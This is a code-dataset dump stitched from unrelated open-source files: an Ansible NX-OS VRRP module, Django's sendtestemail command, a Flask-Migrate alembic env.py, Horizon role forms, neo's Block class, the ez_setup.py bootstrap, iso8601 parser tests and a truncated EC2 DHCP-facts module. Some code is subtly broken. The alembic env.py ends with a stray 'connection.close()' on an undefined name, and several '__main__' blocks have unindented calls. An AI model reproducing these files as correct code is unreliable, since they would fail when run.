                         error=str(clie), commands=commands)
def get_cli_body_ssh_vrrp(command, response, module):
    """Normalise CLI (ssh) output into the structure NX-API would return.

    Hack for transport=cli: '| json' on an unsupported or absent resource
    yields an XML string (treated as "no data"), 'show run' output stays raw
    text, and anything else must parse as JSON or the module fails.
    """
    first_line = response[0]
    if 'xml' in first_line:
        parsed = []
    elif 'show run' in command:
        parsed = response
    else:
        try:
            stripped = first_line.replace(command + '\n\n', '').strip()
            parsed = [json.loads(stripped)]
        except ValueError:
            module.fail_json(msg='Command does not support JSON output',
                            command=command)
    return parsed
def execute_show(cmds, module, command_type=None):
    """Run show commands on the device and return the raw response.

    :param cmds: list of show commands
    :param module: module object providing execute() and fail_json()
    :param command_type: optional transport command type (e.g. 'cli_show')
    """
    try:
        if command_type:
            response = module.execute(cmds, command_type=command_type)
        else:
            response = module.execute(cmds)
    except ShellError as clie:
        # Bug fix: the message referenced an undefined name 'command', which
        # raised NameError while handling the original ShellError. Report the
        # actual command list, and use Python-3-compatible except syntax.
        module.fail_json(msg='Error sending {0}'.format(cmds),
                         error=str(clie))
    return response
def execute_show_command(command, module, command_type='cli_show'):
    """Run *command* over the transport configured on *module* and return
    the structured body.

    cli transport appends '| json' and post-processes the raw text; nxapi
    returns structured data directly.
    """
    transport = module.params['transport']
    if transport == 'cli':
        full_command = command + ' | json'
        response = execute_show([full_command], module)
        body = get_cli_body_ssh_vrrp(full_command, response, module)
    elif transport == 'nxapi':
        body = execute_show([command], module, command_type=command_type)
    return body
def apply_key_map(key_map, table):
    """Rename the keys of *table* using *key_map*, dropping unmapped keys.

    Truthy values are coerced to str (device output normalisation); falsy
    values are kept as-is.
    """
    renamed = {}
    for old_key, value in table.items():
        new_key = key_map.get(old_key)
        if not new_key:
            continue
        renamed[new_key] = str(value) if value else value
    return renamed
def get_interface_type(interface):
    """Classify an NX-OS interface name by its leading characters."""
    # Order matters only for readability here; the prefixes are disjoint.
    prefix_types = (
        ('ET', 'ethernet'),
        ('VL', 'svi'),
        ('LO', 'loopback'),
        ('MG', 'management'),
        ('MA', 'management'),
        ('PO', 'portchannel'),
    )
    upper_name = interface.upper()
    for prefix, intf_type in prefix_types:
        if upper_name.startswith(prefix):
            return intf_type
    return 'unknown'
def is_default(interface, module):
    """Return True if *interface* carries no configuration beyond its bare
    'interface' line, False if it does, and 'DNE' if it does not exist."""
    command = 'show run interface {0}'.format(interface)
    try:
        body = execute_show_command(command, module)[0]
        if 'invalid' in body.lower():
            return 'DNE'
        # Only the 'interface ...' header left means no extra config.
        return body.split('\n')[-1].startswith('interface')
    except KeyError:
        return 'DNE'
def get_interface_mode(interface, intf_type, module):
    """Return 'layer2', 'layer3', or 'unknown' for *interface*.

    SVIs are always layer3; ethernet/port-channel interfaces are queried
    from the device, with 'access'/'trunk' collapsing to 'layer2'.
    """
    command = 'show interface {0}'.format(interface)
    # Fix: removed a dead 'interface = {}' assignment that pointlessly
    # shadowed the parameter and was never read.
    mode = 'unknown'
    if intf_type in ['ethernet', 'portchannel']:
        body = execute_show_command(command, module)[0]
        interface_table = body['TABLE_interface']['ROW_interface']
        # Missing eth_mode means the port is routed (layer3).
        mode = str(interface_table.get('eth_mode', 'layer3'))
        if mode == 'access' or mode == 'trunk':
            mode = 'layer2'
    elif intf_type == 'svi':
        mode = 'layer3'
    return mode
def get_existing_vrrp(interface, group, module):
    """Fetch the configured VRRP settings for *group* on *interface*.

    :return: normalised dict (keys: group, vip, priority, preempt,
        authentication, interval), or {} when the group is not configured.
    """
    command = 'show vrrp detail interface {0}'.format(interface)
    body = execute_show_command(command, module)
    key_map = {
        'sh_group_id': 'group',
        'sh_vip_addr': 'vip',
        'sh_priority': 'priority',
        'sh_group_preempt': 'preempt',
        'sh_auth_text': 'authentication',
        'sh_adv_interval': 'interval'
    }
    try:
        vrrp_table = body[0]['TABLE_vrrp_group']
    except (AttributeError, IndexError, TypeError):
        # No VRRP configured on this interface at all.
        return {}
    if isinstance(vrrp_table, dict):
        # A single group comes back as a bare dict rather than a list.
        vrrp_table = [vrrp_table]
    for entry in vrrp_table:
        parsed = apply_key_map(key_map, entry['ROW_vrrp_group'])
        # The device reports preempt as the strings Enable/Disable.
        if parsed['preempt'] == 'Disable':
            parsed['preempt'] = False
        elif parsed['preempt'] == 'Enable':
            parsed['preempt'] = True
        if parsed['group'] == group:
            return parsed
    return {}
def get_commands_config_vrrp(delta, group):
    """Build the CLI command list applying the settings in *delta* to VRRP
    group *group*. The group sub-mode command always comes first."""
    commands = ['vrrp {0}'.format(group)]
    vip = delta.get('vip')
    if vip:
        commands.append('address {0}'.format(vip))
    priority = delta.get('priority')
    if priority:
        commands.append('priority {0}'.format(priority))
    preempt = delta.get('preempt')
    if preempt:
        commands.append('preempt')
    elif preempt is False:
        # Tri-state: None means "leave untouched", False means disable.
        commands.append('no preempt')
    interval = delta.get('interval')
    if interval:
        commands.append('advertisement-interval {0}'.format(interval))
    auth = delta.get('authentication')
    if auth:
        commands.append('authentication text {0}'.format(auth))
    return commands
def flatten_list(command_lists):
    """Flatten one level: list items are spliced in, scalars appended."""
    flattened = []
    for item in command_lists:
        flattened.extend(item if isinstance(item, list) else [item])
    return flattened
def validate_params(param, module):
    """Fail the module when 'group' or 'priority' is outside its valid
    numeric range (group: 1-255, priority: 1-254).

    Non-numeric strings trip the same ValueError path as out-of-range ints.
    """
    value = module.params[param]
    if param == 'group':
        try:
            if not 1 <= int(value) <= 255:
                raise ValueError
        except ValueError:
            module.fail_json(msg="Warning! 'group' must be an integer between"
                                 " 1 and 255", group=value)
    elif param == 'priority':
        try:
            if not 1 <= int(value) <= 254:
                raise ValueError
        except ValueError:
            module.fail_json(msg="Warning! 'priority' must be an integer "
                                 "between 1 and 254", priority=value)
def main():
    """Ansible entry point: validate input, diff proposed vs existing VRRP
    config, and push the minimal command set to the device."""
    # 'preempt' is deliberately tri-state (None = leave untouched).
    argument_spec = dict(
        group=dict(required=True, type='str'),
        interface=dict(required=True),
        priority=dict(required=False, type='str'),
        preempt=dict(required=False, choices=BOOLEANS, type='bool'),
        vip=dict(required=False, type='str'),
        authentication=dict(required=False, type='str'),
        state=dict(choices=['absent', 'present'],
                   required=False, default='present'),
    )
    module = get_module(argument_spec=argument_spec,
                        supports_check_mode=True)

    state = module.params['state']
    interface = module.params['interface'].lower()
    group = module.params['group']
    priority = module.params['priority']
    preempt = module.params['preempt']
    vip = module.params['vip']
    authentication = module.params['authentication']
    transport = module.params['transport']

    # vip is required on create so removal (state=absent) stays deliberate.
    if state == 'present' and not vip:
        module.fail_json(msg='the "vip" param is required when state=present')

    intf_type = get_interface_type(interface)
    if (intf_type != 'ethernet' and transport == 'cli'):
        # Non-ethernet interfaces (e.g. SVIs) must pre-exist; VRRP is not
        # supported on loopbacks at all.
        if is_default(interface, module) == 'DNE':
            module.fail_json(msg='That interface does not exist yet. Create '
                                 'it first.', interface=interface)
        if intf_type == 'loopback':
            module.fail_json(msg="Loopback interfaces don't support VRRP.",
                             interface=interface)

    mode = get_interface_mode(interface, intf_type, module)
    if mode == 'layer2':
        module.fail_json(msg='That interface is a layer2 port.\nMake it '
                             'a layer 3 port first.', interface=interface)

    args = dict(group=group, priority=priority, preempt=preempt,
                vip=vip, authentication=authentication)

    # Only explicitly supplied params participate in the diff.
    proposed = dict((k, v) for k, v in args.iteritems() if v is not None)
    existing = get_existing_vrrp(interface, group, module)

    changed = False
    end_state = existing
    commands = []
    if state == 'present':
        # delta = proposed k/v pairs that differ from what is on the device.
        delta = dict(
            set(proposed.iteritems()).difference(existing.iteritems()))
        if delta:
            command = get_commands_config_vrrp(delta, group)
            commands.append(command)
    elif state == 'absent':
        if existing:
            commands.append(['no vrrp {0}'.format(group)])

    if commands:
        # All vrrp commands run under the interface sub-mode.
        commands.insert(0, ['interface {0}'.format(interface)])

    cmds = flatten_list(commands)
    if cmds:
        if module.check_mode:
            # Check mode: report what would change without touching the box.
            module.exit_json(changed=True, commands=cmds)
        else:
            execute_config_command(cmds, module)
            changed = True
            end_state = get_existing_vrrp(interface, group, module)

    results = {}
    results['proposed'] = proposed
    results['existing'] = existing
    results['state'] = state
    results['updates'] = cmds
    results['changed'] = changed
    results['end_state'] = end_state

    module.exit_json(**results)
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
from ansible.module_utils.shell import *
from ansible.module_utils.netcfg import *
from ansible.module_utils.nxos import *
if __name__ == '__main__':
main() | gpl-3.0 |
haxoza/django | django/core/management/commands/sendtestemail.py | 349 | 1449 | import socket
from django.core.mail import mail_admins, mail_managers, send_mail
from django.core.management.base import BaseCommand
from django.utils import timezone
class Command(BaseCommand):
    """Management command that sends a test email so outgoing mail settings
    can be verified from the command line."""

    help = "Sends a test email to the email addresses specified as arguments."
    # Fix: the message previously referred to a nonexistent '--admin' option;
    # the actual flag registered below is '--admins'.
    missing_args_message = "You must specify some email recipients, or pass the --managers or --admins options."

    def add_arguments(self, parser):
        """Register positional recipients plus --managers/--admins flags."""
        parser.add_argument('email', nargs='*',
            help='One or more email addresses to send a test email to.')
        parser.add_argument('--managers', action='store_true', dest='managers', default=False,
            help='Send a test email to the addresses specified in settings.MANAGERS.')
        parser.add_argument('--admins', action='store_true', dest='admins', default=False,
            help='Send a test email to the addresses specified in settings.ADMINS.')

    def handle(self, *args, **kwargs):
        # Timestamped subject makes repeated test runs distinguishable.
        subject = 'Test email from %s on %s' % (socket.gethostname(), timezone.now())
        send_mail(
            subject=subject,
            message="If you're reading this, it was successful.",
            from_email=None,
            recipient_list=kwargs['email'],
        )
        if kwargs['managers']:
            mail_managers(subject, "This email was sent to the site managers.")
        if kwargs['admins']:
            mail_admins(subject, "This email was sent to the site admins.")
| bsd-3-clause |
gitgik/flask-rest-api | migrations/env.py | 557 | 2883 | from __future__ import with_statement
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import fileConfig
import logging
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config

# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
logger = logging.getLogger('alembic.env')

# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
from flask import current_app
# Point alembic at the Flask app's database URL and reuse Flask-Migrate's
# metadata so autogenerate can diff against the application models.
config.set_main_option('sqlalchemy.url',
                       current_app.config.get('SQLALCHEMY_DATABASE_URI'))
target_metadata = current_app.extensions['migrate'].db.metadata
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
    """Run migrations in 'offline' mode.

    The context is configured with just a database URL — no Engine and
    therefore no DBAPI is required. context.execute() emits the SQL to the
    script output instead of a live connection.
    """
    context.configure(url=config.get_main_option("sqlalchemy.url"))
    with context.begin_transaction():
        context.run_migrations()
def run_migrations_online():
    """Run migrations in 'online' mode: build an Engine and run the
    migrations over a real database connection."""

    def process_revision_directives(context, revision, directives):
        # Drop the auto-generated revision when the schema is unchanged so
        # 'revision --autogenerate' does not emit empty migration files.
        # reference: http://alembic.readthedocs.org/en/latest/cookbook.html
        if getattr(config.cmd_opts, 'autogenerate', False):
            script = directives[0]
            if script.upgrade_ops.is_empty():
                directives[:] = []
                logger.info('No changes in schema detected.')

    engine = engine_from_config(config.get_section(config.config_ini_section),
                                prefix='sqlalchemy.',
                                poolclass=pool.NullPool)
    conn = engine.connect()
    context.configure(connection=conn,
                      target_metadata=target_metadata,
                      process_revision_directives=process_revision_directives,
                      **current_app.extensions['migrate'].configure_args)
    try:
        with context.begin_transaction():
            context.run_migrations()
    finally:
        # Always release the connection, even when a migration fails.
        conn.close()
connection.close()
# Entry point: alembic decides offline vs online mode before sourcing env.py.
if context.is_offline_mode():
    run_migrations_offline()
else:
    run_migrations_online()
| mit |
RudoCris/horizon | openstack_dashboard/dashboards/identity/roles/forms.py | 91 | 1701 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard import api
class CreateRoleForm(forms.SelfHandlingForm):
    """Self-handling form that creates a keystone role."""

    name = forms.CharField(label=_("Role Name"))

    def handle(self, request, data):
        """Create the role, reporting success or surfacing the error."""
        try:
            # Local renamed from the misleading 'new_user' — this is a role.
            role = api.keystone.role_create(request, data["name"])
            messages.success(request, _("Role created successfully."))
            return role
        except Exception:
            exceptions.handle(request, _('Unable to create role.'))
class UpdateRoleForm(forms.SelfHandlingForm):
    """Self-handling form that renames an existing keystone role."""
    # 'id' arrives pre-populated and hidden; only the name is editable.
    id = forms.CharField(label=_("ID"), widget=forms.HiddenInput)
    name = forms.CharField(label=_("Role Name"))

    def handle(self, request, data):
        """Apply the new name to the role identified by data['id']."""
        try:
            api.keystone.role_update(request, data['id'], data["name"])
            messages.success(request, _("Role updated successfully."))
            return True
        except Exception:
            exceptions.handle(request, _('Unable to update role.'))
| apache-2.0 |
apdavison/python-neo | neo/core/block.py | 3 | 4982 | '''
This module defines :class:`Block`, the main container gathering all the data,
whether discrete or continuous, for a given recording session.
:class:`Block` derives from :class:`Container`,
from :module:`neo.core.container`.
'''
from datetime import datetime
from neo.core.container import Container, unique_objs
class Block(Container):
    '''
    Main container gathering all the data, whether discrete or continuous, for a
    given recording session.

    A block is not necessarily temporally homogeneous, in contrast to :class:`Segment`.

    *Usage*::

        >>> from neo.core import Block, Segment, Group, AnalogSignal
        >>> from quantities import nA, kHz
        >>> import numpy as np
        >>>
        >>> # create a Block with 3 Segment and 2 Group objects
        ... blk = Block()
        >>> for ind in range(3):
        ...     seg = Segment(name='segment %d' % ind, index=ind)
        ...     blk.segments.append(seg)
        ...
        >>> for ind in range(2):
        ...     group = Group(name='Array probe %d' % ind)
        ...     blk.groups.append(group)
        ...
        >>> # Populate the Block with AnalogSignal objects
        ... for seg in blk.segments:
        ...     for group in blk.groups:
        ...         a = AnalogSignal(np.random.randn(10000, 64)*nA,
        ...                          sampling_rate=10*kHz)
        ...         group.analogsignals.append(a)
        ...         seg.analogsignals.append(a)

    *Required attributes/properties*:
        None

    *Recommended attributes/properties*:
        :name: (str) A label for the dataset.
        :description: (str) Text description.
        :file_origin: (str) Filesystem path or URL of the original data file.
        :file_datetime: (datetime) The creation date and time of the original
            data file.
        :rec_datetime: (datetime) The date and time of the original recording.

    *Properties available on this object*:
        :list_units: (deprecated) descends through hierarchy and returns a list of
            :class:`Unit` objects existing in the block. This shortcut exists
            because a common analysis case is analyzing all neurons that
            you recorded in a session.

    Note: Any other additional arguments are assumed to be user-specific
    metadata and stored in :attr:`annotations`.

    *Container of*:
        :class:`Segment`
        :class:`Group`
        :class:`ChannelIndex` (deprecated)
    '''

    # Container-machinery declarations consumed by the neo.core.container
    # base class (child containment, pretty-printing, attribute validation).
    _container_child_objects = ('Segment', 'ChannelIndex', 'Group')
    _child_properties = ('Unit',)
    _recommended_attrs = ((('file_datetime', datetime),
                           ('rec_datetime', datetime),
                           ('index', int)) +
                          Container._recommended_attrs)
    _repr_pretty_attrs_keys_ = (Container._repr_pretty_attrs_keys_ +
                                ('file_origin', 'file_datetime',
                                 'rec_datetime', 'index'))
    _repr_pretty_containers = ('segments',)

    def __init__(self, name=None, description=None, file_origin=None,
                 file_datetime=None, rec_datetime=None, index=None,
                 **annotations):
        '''
        Initialize a new :class:`Block` instance.
        '''
        super().__init__(name=name, description=description,
                         file_origin=file_origin, **annotations)
        self.file_datetime = file_datetime
        self.rec_datetime = rec_datetime
        self.index = index
        self.regionsofinterest = []  # temporary workaround.
        # the goal is to store all sub-classes of RegionOfInterest in a single list
        # but this will need substantial changes to container handling

    @property
    def data_children_recur(self):
        '''
        All data child objects stored in the current object,
        obtained recursively.
        '''
        # subclassing this to remove duplicate objects such as SpikeTrain
        # objects in both Segment and Unit
        # Only Block can have duplicate items right now, so implement
        # this here for performance reasons.
        return tuple(unique_objs(super().data_children_recur))

    def list_children_by_class(self, cls):
        '''
        List all children of a particular class recursively.

        You can either provide a class object, a class name,
        or the name of the container storing the class.
        '''
        # subclassing this to remove duplicate objects such as SpikeTrain
        # objects in both Segment and Unit
        # Only Block can have duplicate items right now, so implement
        # this here for performance reasons.
        return unique_objs(super().list_children_by_class(cls))

    @property
    def list_units(self):
        '''
        Return a list of all :class:`Unit` objects in the :class:`Block`.
        '''
        return self.list_children_by_class('unit')
| bsd-3-clause |
eceglov/phantomjs | src/breakpad/src/third_party/protobuf/protobuf/python/ez_setup.py | 454 | 10334 | #!python
# This file was obtained from:
# http://peak.telecommunity.com/dist/ez_setup.py
# on 2011/1/21.
"""Bootstrap setuptools installation
If you want to use setuptools in your package's setup.py, just include this
file in the same directory with it, and add this to the top of your setup.py::
from ez_setup import use_setuptools
use_setuptools()
If you want to require a specific version of setuptools, set a download
mirror, or use an alternate download directory, you can do so by supplying
the appropriate options to ``use_setuptools()``.
This file can also be run as a script to install or upgrade setuptools.
"""
import sys
DEFAULT_VERSION = "0.6c11"
DEFAULT_URL = "http://pypi.python.org/packages/%s/s/setuptools/" % sys.version[:3]
md5_data = {
'setuptools-0.6b1-py2.3.egg': '8822caf901250d848b996b7f25c6e6ca',
'setuptools-0.6b1-py2.4.egg': 'b79a8a403e4502fbb85ee3f1941735cb',
'setuptools-0.6b2-py2.3.egg': '5657759d8a6d8fc44070a9d07272d99b',
'setuptools-0.6b2-py2.4.egg': '4996a8d169d2be661fa32a6e52e4f82a',
'setuptools-0.6b3-py2.3.egg': 'bb31c0fc7399a63579975cad9f5a0618',
'setuptools-0.6b3-py2.4.egg': '38a8c6b3d6ecd22247f179f7da669fac',
'setuptools-0.6b4-py2.3.egg': '62045a24ed4e1ebc77fe039aa4e6f7e5',
'setuptools-0.6b4-py2.4.egg': '4cb2a185d228dacffb2d17f103b3b1c4',
'setuptools-0.6c1-py2.3.egg': 'b3f2b5539d65cb7f74ad79127f1a908c',
'setuptools-0.6c1-py2.4.egg': 'b45adeda0667d2d2ffe14009364f2a4b',
'setuptools-0.6c10-py2.3.egg': 'ce1e2ab5d3a0256456d9fc13800a7090',
'setuptools-0.6c10-py2.4.egg': '57d6d9d6e9b80772c59a53a8433a5dd4',
'setuptools-0.6c10-py2.5.egg': 'de46ac8b1c97c895572e5e8596aeb8c7',
'setuptools-0.6c10-py2.6.egg': '58ea40aef06da02ce641495523a0b7f5',
'setuptools-0.6c11-py2.3.egg': '2baeac6e13d414a9d28e7ba5b5a596de',
'setuptools-0.6c11-py2.4.egg': 'bd639f9b0eac4c42497034dec2ec0c2b',
'setuptools-0.6c11-py2.5.egg': '64c94f3bf7a72a13ec83e0b24f2749b2',
'setuptools-0.6c11-py2.6.egg': 'bfa92100bd772d5a213eedd356d64086',
'setuptools-0.6c2-py2.3.egg': 'f0064bf6aa2b7d0f3ba0b43f20817c27',
'setuptools-0.6c2-py2.4.egg': '616192eec35f47e8ea16cd6a122b7277',
'setuptools-0.6c3-py2.3.egg': 'f181fa125dfe85a259c9cd6f1d7b78fa',
'setuptools-0.6c3-py2.4.egg': 'e0ed74682c998bfb73bf803a50e7b71e',
'setuptools-0.6c3-py2.5.egg': 'abef16fdd61955514841c7c6bd98965e',
'setuptools-0.6c4-py2.3.egg': 'b0b9131acab32022bfac7f44c5d7971f',
'setuptools-0.6c4-py2.4.egg': '2a1f9656d4fbf3c97bf946c0a124e6e2',
'setuptools-0.6c4-py2.5.egg': '8f5a052e32cdb9c72bcf4b5526f28afc',
'setuptools-0.6c5-py2.3.egg': 'ee9fd80965da04f2f3e6b3576e9d8167',
'setuptools-0.6c5-py2.4.egg': 'afe2adf1c01701ee841761f5bcd8aa64',
'setuptools-0.6c5-py2.5.egg': 'a8d3f61494ccaa8714dfed37bccd3d5d',
'setuptools-0.6c6-py2.3.egg': '35686b78116a668847237b69d549ec20',
'setuptools-0.6c6-py2.4.egg': '3c56af57be3225019260a644430065ab',
'setuptools-0.6c6-py2.5.egg': 'b2f8a7520709a5b34f80946de5f02f53',
'setuptools-0.6c7-py2.3.egg': '209fdf9adc3a615e5115b725658e13e2',
'setuptools-0.6c7-py2.4.egg': '5a8f954807d46a0fb67cf1f26c55a82e',
'setuptools-0.6c7-py2.5.egg': '45d2ad28f9750e7434111fde831e8372',
'setuptools-0.6c8-py2.3.egg': '50759d29b349db8cfd807ba8303f1902',
'setuptools-0.6c8-py2.4.egg': 'cba38d74f7d483c06e9daa6070cce6de',
'setuptools-0.6c8-py2.5.egg': '1721747ee329dc150590a58b3e1ac95b',
'setuptools-0.6c9-py2.3.egg': 'a83c4020414807b496e4cfbe08507c03',
'setuptools-0.6c9-py2.4.egg': '260a2be2e5388d66bdaee06abec6342a',
'setuptools-0.6c9-py2.5.egg': 'fe67c3e5a17b12c0e7c541b7ea43a8e6',
'setuptools-0.6c9-py2.6.egg': 'ca37b1ff16fa2ede6e19383e7b59245a',
}
import sys, os
try: from hashlib import md5
except ImportError: from md5 import md5
def _validate_md5(egg_name, data):
    # Verify a downloaded egg against the known-good md5 table above; abort
    # the bootstrap on mismatch rather than install a corrupted download.
    # Unknown egg names are passed through unchecked.
    if egg_name in md5_data:
        digest = md5(data).hexdigest()
        if digest != md5_data[egg_name]:
            print >>sys.stderr, (
                "md5 validation of %s failed! (Possible download problem?)"
                % egg_name
            )
            sys.exit(2)
    return data
def use_setuptools(
    version=DEFAULT_VERSION, download_base=DEFAULT_URL, to_dir=os.curdir,
    download_delay=15
):
    """Automatically find/download setuptools and make it available on sys.path

    `version` should be a valid setuptools version number that is available
    as an egg for download under the `download_base` URL (which should end with
    a '/'). `to_dir` is the directory where setuptools will be downloaded, if
    it is not already available. If `download_delay` is specified, it should
    be the number of seconds that will be paused before initiating a download,
    should one be required. If an older version of setuptools is installed,
    this routine will print a message to ``sys.stderr`` and raise SystemExit in
    an attempt to abort the calling script.
    """
    was_imported = 'pkg_resources' in sys.modules or 'setuptools' in sys.modules
    def do_download():
        # Fetch the egg and make it importable for the rest of this process.
        egg = download_setuptools(version, download_base, to_dir, download_delay)
        sys.path.insert(0, egg)
        import setuptools; setuptools.bootstrap_install_from = egg
    try:
        import pkg_resources
    except ImportError:
        # No setuptools at all: bootstrap from scratch.
        return do_download()
    try:
        pkg_resources.require("setuptools>="+version); return
    except pkg_resources.VersionConflict, e:
        # An older setuptools is installed. If it is already imported we
        # cannot safely replace it mid-run, so bail out with instructions.
        if was_imported:
            print >>sys.stderr, (
            "The required version of setuptools (>=%s) is not available, and\n"
            "can't be installed while this script is running. Please install\n"
            " a more recent version first, using 'easy_install -U setuptools'."
            "\n\n(Currently using %r)"
            ) % (version, e.args[0])
            sys.exit(2)
    except pkg_resources.DistributionNotFound:
        pass
    # Not imported yet (or not found): drop the stale module and download.
    del pkg_resources, sys.modules['pkg_resources'] # reload ok
    return do_download()
def download_setuptools(
    version=DEFAULT_VERSION, download_base=DEFAULT_URL, to_dir=os.curdir,
    delay = 15
):
    """Download setuptools from a specified location and return its filename

    `version` should be a valid setuptools version number that is available
    as an egg for download under the `download_base` URL (which should end
    with a '/'). `to_dir` is the directory where the egg will be downloaded.
    `delay` is the number of seconds to pause before an actual download attempt.
    """
    import urllib2, shutil
    egg_name = "setuptools-%s-py%s.egg" % (version,sys.version[:3])
    url = download_base + egg_name
    saveto = os.path.join(to_dir, egg_name)
    src = dst = None
    if not os.path.exists(saveto): # Avoid repeated downloads
        try:
            from distutils import log
            if delay:
                # Give the user a chance to abort (or pre-place the file)
                # before any network access happens.
                log.warn("""
---------------------------------------------------------------------------
This script requires setuptools version %s to run (even to display
help). I will attempt to download it for you (from
%s), but
you may need to enable firewall access for this script first.
I will start the download in %d seconds.

(Note: if this machine does not have network access, please obtain the file

   %s

and place it in this directory before rerunning this script.)
---------------------------------------------------------------------------""",
                    version, download_base, delay, url
                ); from time import sleep; sleep(delay)
            log.warn("Downloading %s", url)
            src = urllib2.urlopen(url)
            # Read/write all in one block, so we don't create a corrupt file
            # if the download is interrupted.
            data = _validate_md5(egg_name, src.read())
            dst = open(saveto,"wb"); dst.write(data)
        finally:
            if src: src.close()
            if dst: dst.close()
    return os.path.realpath(saveto)
def main(argv, version=DEFAULT_VERSION):
    """Install or upgrade setuptools and EasyInstall"""
    try:
        import setuptools
    except ImportError:
        # No setuptools at all: download a temporary egg, run easy_install
        # from it, then remove the egg again.
        egg = None
        try:
            egg = download_setuptools(version, delay=0)
            sys.path.insert(0,egg)
            from setuptools.command.easy_install import main
            return main(list(argv)+[egg]) # we're done here
        finally:
            if egg and os.path.exists(egg):
                os.unlink(egg)
    else:
        if setuptools.__version__ == '0.0.1':
            # 0.0.1 is the broken placeholder some distros shipped.
            print >>sys.stderr, (
            "You have an obsolete version of setuptools installed. Please\n"
            "remove it from your system entirely before rerunning this script."
            )
            sys.exit(2)

    req = "setuptools>="+version
    import pkg_resources
    try:
        pkg_resources.require(req)
    except pkg_resources.VersionConflict:
        # Installed version is too old: upgrade it via easy_install.
        try:
            from setuptools.command.easy_install import main
        except ImportError:
            from easy_install import main
        main(list(argv)+[download_setuptools(delay=0)])
        sys.exit(0) # try to force an exit
    else:
        if argv:
            from setuptools.command.easy_install import main
            main(argv)
        else:
            print "Setuptools version",version,"or greater has been installed."
            print '(Run "ez_setup.py -U setuptools" to reinstall or upgrade.)'
def update_md5(filenames):
    """Update our built-in md5 registry"""
    import re

    # Hash each given egg file and record it under its basename.
    for name in filenames:
        base = os.path.basename(name)
        f = open(name,'rb')
        md5_data[base] = md5(f.read()).hexdigest()
        f.close()

    # Render the registry as sorted source lines...
    data = ["    %r: %r,\n" % it for it in md5_data.items()]
    data.sort()
    repl = "".join(data)

    # ...and splice them back into this script's own source in place of
    # the existing md5_data literal (self-modifying maintenance helper).
    import inspect
    srcfile = inspect.getsourcefile(sys.modules[__name__])
    f = open(srcfile, 'rb'); src = f.read(); f.close()

    match = re.search("\nmd5_data = {\n([^}]+)}", src)
    if not match:
        print >>sys.stderr, "Internal error!"
        sys.exit(2)

    src = src[:match.start(1)] + repl + src[match.end(1):]
    f = open(srcfile,'w')
    f.write(src)
    f.close()
if __name__=='__main__':
if len(sys.argv)>2 and sys.argv[1]=='--md5update':
update_md5(sys.argv[2:])
else:
main(sys.argv[1:])
| bsd-3-clause |
JaDogg/__py_playground | reference/parsley/examples/test_iso8601.py | 3 | 1888 | import datetime
import unittest
import pytest
pytz = pytest.importorskip('pytz')
from iso8601 import DateTimeParser
class TestDatetimeParsing(unittest.TestCase):
    """Exercise DateTimeParser's individual grammar rules (date, naive and
    zoned time, numeric offsets, full datetime) against known ISO 8601
    strings."""

    def test_date(self):
        self.assertEqual(
            datetime.date(2001, 12, 25),
            DateTimeParser('2001-12-25').date())

    def test_naive_time(self):
        self.assertEqual(
            datetime.time(13, 59, 43),
            DateTimeParser('13:59:43').naive_time())

    def test_fractional_naive_time(self):
        # fractional seconds parse into microseconds: .88 -> 880000
        self.assertEqual(
            datetime.time(13, 59, 43, 880000),
            DateTimeParser('13:59:43.88').naive_time())

    def test_utc_time(self):
        self.assertEqual(
            datetime.time(13, 59, 43, tzinfo=pytz.UTC),
            DateTimeParser('13:59:43Z').time())

    def test_fractional_utc_time(self):
        self.assertEqual(
            datetime.time(13, 59, 43, 880000, tzinfo=pytz.UTC),
            DateTimeParser('13:59:43.88Z').time())

    def test_timezone_time(self):
        self.assertEqual(
            datetime.time(13, 59, 43, tzinfo=pytz.FixedOffset(60)),
            DateTimeParser('13:59:43+01:00').time())

    def test_fractional_timezone_time(self):
        self.assertEqual(
            datetime.time(13, 59, 43, 770000, tzinfo=pytz.FixedOffset(60)),
            DateTimeParser('13:59:43.77+01:00').time())

    def test_numeric_offset(self):
        # offsets are expressed in minutes, signed
        get_offset = lambda x: DateTimeParser(x).numeric_offset()
        self.assertEqual(pytz.FixedOffset(0), get_offset('+00:00'))
        self.assertEqual(pytz.FixedOffset(90), get_offset('+01:30'))
        self.assertEqual(pytz.FixedOffset(-150), get_offset('-02:30'))

    def test_datetime(self):
        self.assertEqual(
            datetime.datetime(
                2001, 12, 25, 13, 59, 43, 770000, tzinfo=pytz.UTC),
            DateTimeParser('2001-12-25T13:59:43.77Z').datetime())
| mit |
jhawkesworth/ansible-modules-extras | cloud/amazon/ec2_vpc_dhcp_options_facts.py | 31 | 5118 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc_dhcp_options_facts
short_description: Gather facts about dhcp options sets in AWS
description:
- Gather facts about dhcp options sets in AWS
version_added: "2.2"
requirements: [ boto3 ]
author: "Nick Aslanidis (@naslanidis)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value. See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeRouteTables.html) for possible filters.
required: false
default: null
DhcpOptionsIds:
description:
- Get details of specific DHCP Option ID
- Provide this value as a list
required: false
default: None
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
